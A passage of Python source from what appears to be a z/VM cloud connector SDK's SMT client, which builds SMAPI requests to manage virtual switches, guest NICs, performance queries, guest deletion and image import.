image_file=None, hostname=None,
skipdiskcopy=False):
if skipdiskcopy:
os_version = image_name
image_disk_type = 'SCSI'
else:
os_version = self.image_get_os_distro(image_name)
# Query image disk type
image_disk_type = self._get_image_disk_type(image_name)
if image_disk_type is None:
err_msg = ("failed to get image disk type for "
"image '%(image_name)s'."
% {'image_name': image_name})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
try:
# Query vm's disk pool type and image disk type
from zvmsdk import dist
_dist_manager = dist.LinuxDistManager()
linuxdist = _dist_manager.get_linux_dist(os_version)()
# Read coros fixed ip parameter from tempfile
fixed_ip_parameter = linuxdist.read_coreos_parameter(userid)
except Exception as err:
err_msg = ("failed to read coreos fixed ip "
"parameters for userid '%(userid)s',"
"error: %(err)s."
% {'userid': userid, 'err': err})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if fixed_ip_parameter is None:
err_msg = ("coreos fixed ip parameters don't exist.")
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if hostname:
# replace hostname to display name instead of userid
fixed_ip_parameter = fixed_ip_parameter.replace(userid.upper(),
hostname)
# read nic device id and change it into the form like
# "0.0.1000,0.0.1001,0.0.1002"
nic_id = self._generate_increasing_nic_id(
fixed_ip_parameter.split(":")[5].replace("enc", ""))
if image_disk_type == 'SCSI':
(wwpn, lun) = self._get_wwpn_lun(userid)
if wwpn is None or lun is None:
err_msg = ("wwpn and lun is required for FCP devices,"
" please set LOADDEV for userid %s" % userid)
raise exception.SDKGuestOperationError(rs=14, userid=userid,
msg=err_msg)
wwpn = '0x' + wwpn
lun = '0x' + lun
if skipdiskcopy:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, transportfiles, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, image_file, transportfiles,
image_disk_type, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file, transportfiles, image_disk_type, nic_id,
fixed_ip_parameter]
def grant_user_to_vswitch(self, vswitch_name, userid):
"""Set vswitch to grant user."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k grant_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to grant user %s to vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def _set_vswitch_exception(self, error, switch_name):
if ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and (error.results['rs'] == 2846)):
errmsg = ("Operation is not allowed for a "
"VLAN UNAWARE vswitch")
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2838) or
(error.results['rs'] == 2853) or
(error.results['rs'] == 2856) or
(error.results['rs'] == 2858) or
(error.results['rs'] == 3022) or
(error.results['rs'] == 3033))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
else:
raise error
def revoke_user_from_vswitch(self, vswitch_name, userid):
"""Revoke user for vswitch."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k revoke_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to revoke user %s from vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def image_performance_query(self, uid_list):
"""Call Image_Performance_Query to get guest current status.
:uid_list: A list of zvm userids to be queried
"""
if uid_list == []:
return {}
if not isinstance(uid_list, list):
uid_list = [uid_list]
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Image_Performance_Query" % smt_userid,
"--operands",
'-T "%s"' % (' '.join(uid_list)),
"-c %d" % len(uid_list)))
action = "get performance info of userid '%s'" % str(uid_list)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
# when there is only one userid queried and this userid is
# in 'off'state, the smcli will only returns the queried
# userid number, no valid performance info returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
def system_image_performance_query(self, namelist):
"""Call System_Image_Performance_Query to get guest current status.
:namelist: A namelist that defined in smapi namelist file.
"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API System_Image_Performance_Query" % smt_userid,
"--operands -T %s" % namelist))
action = "get performance info of namelist '%s'" % namelist
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
# when there is only one userid queried and this userid is
# in 'off'state, the smcli will only returns the queried
# userid number, no valid performance info returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
def virtual_network_vswitch_query_byte_stats(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Byte_Stats" %
smt_userid,
"--operands",
'-T "%s"' % smt_userid,
'-k "switch_name=*"'
))
action = "query vswitch usage info"
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return self._parse_vswitch_inspect_data(results['response'])
def get_host_info(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost general")
host_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.RINV_HOST_KEYWORDS)
return host_info
def get_diskpool_info(self, pool):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost diskpoolspace %s" % pool)
dp_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.DISKPOOL_KEYWORDS)
return dp_info
def get_vswitch_list(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query" % smt_userid,
"--operands",
"-s \'*\'"))
try:
result = self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
LOG.warning("No Virtual switch in the host")
return []
else:
LOG.error("Failed to get vswitch list, error: %s" %
err.format_message())
raise
with zvmutils.expect_invalid_resp_data():
if (not result['response'] or not result['response'][0]):
return []
else:
data = '\n'.join([s for s in result['response']
if isinstance(s, six.string_types)])
output = re.findall('VSWITCH: Name: (.*)', data)
return output
def set_vswitch_port_vlan_id(self, vswitch_name, userid, vlan_id):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k grant_userid=%s" % userid,
"-k switch_name=%s" % vswitch_name,
"-k user_vlan_id=%s" % vlan_id,
"-k persist=YES"))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set VLAN ID %s on vswitch %s for user %s, "
"error: %s" %
(vlan_id, vswitch_name, userid, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
msg = ('Set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s successfully'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
def add_vswitch(self, name, rdev=None, controller='*',
connection='CONNECT', network_type='ETHERNET',
router="NONROUTER", vid='UNAWARE', port_type='ACCESS',
gvrp='GVRP', queue_mem=8, native_vid=1, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Create_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % name))
if rdev is not None:
rd += " -k real_device_address" +\
"=\'%s\'" % rdev.replace(',', ' ')
if controller != '*':
rd += " -k controller_name=%s" % controller
rd = ' '.join((rd,
"-k connection_value=%s" % connection,
"-k queue_memory_limit=%s" % queue_mem,
"-k transport_type=%s" % network_type,
"-k vlan_id=%s" % vid,
"-k persist=%s" % (persist and 'YES' or 'NO')))
# Only if vswitch is vlan awared, port_type, gvrp and native_vid are
# allowed to specified
if isinstance(vid, int) or vid.upper() != 'UNAWARE':
rd = ' '.join((rd,
"-k port_type=%s" % port_type,
"-k gvrp_value=%s" % gvrp,
"-k native_vlanid=%s" % native_vid))
if router is not None:
rd += " -k routing_value=%s" % router
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to create vswitch %s, error: %s" %
(name, err.format_message()))
raise
msg = ('Create vswitch %s successfully' % name)
LOG.info(msg)
def set_vswitch(self, switch_name, **kwargs):
"""Set vswitch"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name))
for k, v in kwargs.items():
rd = ' '.join((rd,
"-k %(key)s=\'%(value)s\'" %
{'key': k, 'value': v}))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set vswitch %s, error: %s" %
(switch_name, err.format_message()))
self._set_vswitch_exception(err, switch_name)
def delete_vswitch(self, switch_name, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to delete vswitch %s' % switch_name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Delete_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name,
"-k persist=%s" % (persist and 'YES' or 'NO')))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
if ((results['rc'] == 212) and
(results['rs'] == 40)):
LOG.warning("Vswitch %s does not exist", switch_name)
return
else:
LOG.error("Failed to delete vswitch %s, error: %s" %
(switch_name, err.format_message()))
raise
msg = ('Delete vswitch %s successfully' % switch_name)
LOG.info(msg)
def create_nic(self, userid, vdev=None, nic_id=None,
mac_addr=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'ID is %(id)s, address is %(address)s',
{'vdev': nic_vdev,
'id': nic_id or 'not specified',
'address': mac_addr or 'not specified'})
self._create_nic(userid, nic_vdev, nic_id=nic_id,
mac_addr=mac_addr, active=active)
return nic_vdev
def _create_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _create_nic_active_exception(self, error, userid, vdev):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 28))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
elif ((error.results['rc'] == 396) and
(error.results['rs'] == 2797)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _is_active(self, userid):
# Get the vm status
power_state = self.get_power_state(userid)
if power_state == 'off':
LOG.error('The vm %s is powered off, '
'active operation is not allowed' % userid)
raise exception.SDKConflictError(modID='network', rs=1,
userid=userid)
def _create_nic(self, userid, vdev, nic_id=None, mac_addr=None,
active=False):
if active:
self._is_active(userid)
msg = ('Start to create nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended_DM' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
if mac_addr is not None:
mac = ''.join(mac_addr.split(':'))[6:]
requestData += ' -k mac_id=%s' % mac
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to create nic %s for user %s in "
"the guest's user direct, error: %s" %
(vdev, userid, err.format_message()))
self._create_nic_inactive_exception(err, userid, vdev)
if active:
if mac_addr is not None:
LOG.warning("Ignore the mac address %s when "
"adding nic on an active system" % mac_addr)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
msg1 = err1.format_message()
persist_OK = True
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Delete_DM' % userid,
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results = err2.results
msg2 = err2.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._create_nic_active_exception(err1, userid, vdev)
else:
raise exception.SDKNetworkOperationError(rs=4,
nic=vdev, userid=userid,
create_err=msg1, revoke_err=msg2)
self._NetDbOperator.switch_add_record(userid, vdev, port=nic_id)
msg = ('Create nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def get_user_direct(self, userid):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm %s directory" % userid)
return results.get('response', [])
def get_all_user_direct(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm alldirectory")
return results.get('response', [])
def _delete_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=8,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _delete_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=9,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def delete_nic(self, userid, vdev, active=False):
if active:
self._is_active(userid)
vdev_exist = False
nic_list = self._NetDbOperator.switch_select_record_for_userid(userid)
for p in nic_list:
if (int(p['interface'], 16) == int(vdev, 16)):
vdev_exist = True
vdev_info = p
break
if not vdev_exist:
# Device has already be removed from user direct
LOG.warning("Virtual device %s does not exist in the switch table",
vdev)
if active:
try:
resp = self.execute_cmd(userid, 'vmcp q %s' % vdev)
nic_info = "%s ON NIC" % vdev.zfill(4).upper()
osa_info = "%s ON OSA" % vdev.zfill(4).upper()
if nic_info in resp[0]:
pass
elif osa_info in resp[0]:
self._undedicate_nic(userid, vdev, active=active,
del_active_only=True)
return
else:
LOG.warning("Device %s of guest %s is not "
"network adapter" % (vdev, userid))
return
except exception.SDKSMTRequestFailed as err:
emsg = err.format_message()
ignored_msg = ('Device %s does not exist'
% vdev.zfill(4).upper())
if (emsg.__contains__(ignored_msg)):
LOG.warning("Virtual device %s does not exist for "
"active guest %s" % (vdev, userid))
return
else:
raise
else:
return
else:
# Device hasnot be removed from user direct,
# check whether it is related to a dedicated OSA device
if ((vdev_info["comments"] is not None) and
(vdev_info["comments"].__contains__('OSA='))):
self._undedicate_nic(userid, vdev, active=active)
return
msg = ('Start to delete nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if vdev_exist:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete_DM" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to delete nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._delete_nic_inactive_exception(err, userid, vdev)
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to delete nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._delete_nic_active_exception(err, userid, vdev)
msg = ('Delete nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _couple_active_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 212) and
((error.results['rs'] == 28) or
(error.results['rs'] == 8))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
elif ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % vswitch
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2788) or
(error.results['rs'] == 2848) or
(error.results['rs'] == 3034) or
(error.results['rs'] == 6011))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
else:
raise error
def _couple_inactive_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 412) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
raise error
def _couple_nic(self, userid, vdev, vswitch_name,
active=False):
"""Couple NIC to vswitch by adding vswitch into user direct."""
if active:
self._is_active(userid)
msg = ('Start to couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s'
% {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s' % userid,
"API Virtual_Network_Adapter_Connect_Vswitch_DM",
"--operands",
"-v %s" % vdev,
"-n %s" % vswitch_name))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to couple nic %s to vswitch %s for user %s "
"in the guest's user direct, error: %s" %
(vdev, vswitch_name, userid, err.format_message()))
self._couple_inactive_exception(err, userid, vdev, vswitch_name)
# the inst must be active, or this call will failed
if active:
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Connect_Vswitch',
"--operands",
"-v %s" % vdev,
"-n %s" % vswitch_name))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
results1 = err1.results
msg1 = err1.format_message()
if ((results1 is not None) and
(results1['rc'] == 204) and
(results1['rs'] == 20)):
LOG.warning("Virtual device %s already connected "
"on the active guest system", vdev)
else:
persist_OK = True
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect_DM',
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results2 = err2.results
msg2 = err2.format_message()
if ((results2 is not None) and
(results2['rc'] == 212) and
(results2['rs'] == 32)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._couple_active_exception(err1, userid, vdev,
vswitch_name)
else:
raise exception.SDKNetworkOperationError(rs=3,
nic=vdev, vswitch=vswitch_name,
couple_err=msg1, revoke_err=msg2)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
vswitch_name)
msg = ('Couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s successfully'
% {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name})
LOG.info(msg)
def couple_nic_to_vswitch(self, userid, nic_vdev,
vswitch_name, active=False):
"""Couple nic to vswitch."""
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Connect nic %s to switch %s %s",
nic_vdev, vswitch_name, msg)
self._couple_nic(userid, nic_vdev, vswitch_name, active=active)
def _uncouple_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=12,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _uncouple_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=13,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def _uncouple_nic(self, userid, vdev, active=False):
"""Uncouple NIC from vswitch"""
if active:
self._is_active(userid)
msg = ('Start to uncouple nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s' % userid,
"API Virtual_Network_Adapter_Disconnect_DM",
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 212) and
(results['rs'] == 32)):
LOG.warning("Virtual device %s is already disconnected "
"in the guest's user direct", vdev)
else:
LOG.error("Failed to uncouple nic %s in the guest's user "
"direct, error: %s" % (vdev, emsg))
self._uncouple_inactive_exception(err, userid, vdev)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
None)
# the inst must be active, or this call will failed
if active:
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect',
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 204) and
(results['rs'] == 48)):
LOG.warning("Virtual device %s is already "
"disconnected on the active "
"guest system", vdev)
else:
LOG.error("Failed to uncouple nic %s on the active "
"guest system, error: %s" % (vdev, emsg))
self._uncouple_active_exception(err, userid, vdev)
msg = ('Uncouple nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def uncouple_nic_from_vswitch(self, userid, nic_vdev,
active=False):
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Disconnect nic %s with network %s",
nic_vdev, msg)
self._uncouple_nic(userid, nic_vdev, active=active)
def delete_userid(self, userid):
rd = ' '.join(('deletevm', userid, 'directory'))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if err.results['rc'] == 400 and err.results['rs'] == 4:
# guest vm definition not found
LOG.debug("The guest %s does not exist." % userid)
return
else:
msg = "SMT error: %s" % err.format_message()
raise exception.SDKSMTRequestFailed(err.results, msg)
def delete_vm(self, userid):
self.delete_userid(userid)
# revoke userid from vswitch
action = "revoke id %s authority from vswitch" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
switch_info = self._NetDbOperator.switch_select_record_for_userid(
userid)
switch_list = set()
for item in switch_info:
switch_list.add(item['switch'])
for item in switch_list:
if item is not None:
self.revoke_user_from_vswitch(item, userid)
# cleanup db record from network table
action = "delete network record for user %s" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._NetDbOperator.switch_delete_record_for_userid(userid)
# TODO: cleanup db record from volume table
pass
# cleanup persistent folder for guest
self._pathutils.remove_guest_path(userid)
# cleanup db record from guest table
action = "delete guest %s from database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.delete_guest_by_userid(userid)
def execute_cmd(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
with zvmutils.log_and_reraise_smt_request_failed(action='execute '
'command on vm via iucv channel'):
results = self._request(requestData)
ret = results['response']
return ret
def execute_cmd_direct(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
results = self._smt.request(requestData)
return results
def image_import(self, image_name, url, image_meta, remote_host=None):
"""Import the image specified in url to SDK image repository, and
create a record in image db, the imported images are located in
image_repository/prov_method/os_version/image_name/, for example,
/opt/sdk/images/netboot/rhel7.2/90685d2b-167bimage/0100"""
image_info = []
try:
image_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image record %s doens't exist in SDK image datebase,"
" will import the image and create record now" % image_name)
LOG.info(msg)
# Ensure the specified image is not exist in image DB
if image_info:
msg = ("The image name %s has already exist in SDK image "
"database, please check if they are same image or consider"
" to use a different image name for import" % image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=13, img=image_name)
try:
image_os_version = image_meta['os_version'].lower()
target_folder = self._pathutils.create_import_image_repository(
image_os_version, const.IMAGE_TYPE['DEPLOY'],
image_name)
except Exception as err:
msg = ('Failed to create repository to store image %(img)s with '
'error: %(err)s, please make sure there are enough space '
'on zvmsdk server and proper permission to create the '
'repository' % {'img': image_name,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
if self.is_rhcos(image_os_version):
image_disk_type = image_meta.get('disk_type')
if ((image_disk_type is None) or
((image_disk_type.upper() != "DASD" and
image_disk_type.upper() != "SCSI"))):
msg = ('Disk type is required for RHCOS image import, '
'the value should be DASD or SCSI')
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
else:
comments = {'disk_type': image_disk_type.upper()}
comments = str(comments)
else:
comments = None
try:
import_image_fn = urlparse.urlparse(url).path.split('/')[-1]
import_image_fpath = '/'.join([target_folder, import_image_fn])
self._scheme2backend(urlparse.urlparse(url).scheme).image_import(
image_name, url,
import_image_fpath,
remote_host=remote_host)
# Check md5 after import to ensure import a correct image
# TODO change to use query image name in DB
expect_md5sum = image_meta.get('md5sum')
real_md5sum = self._get_md5sum(import_image_fpath)
if expect_md5sum and expect_md5sum != real_md5sum:
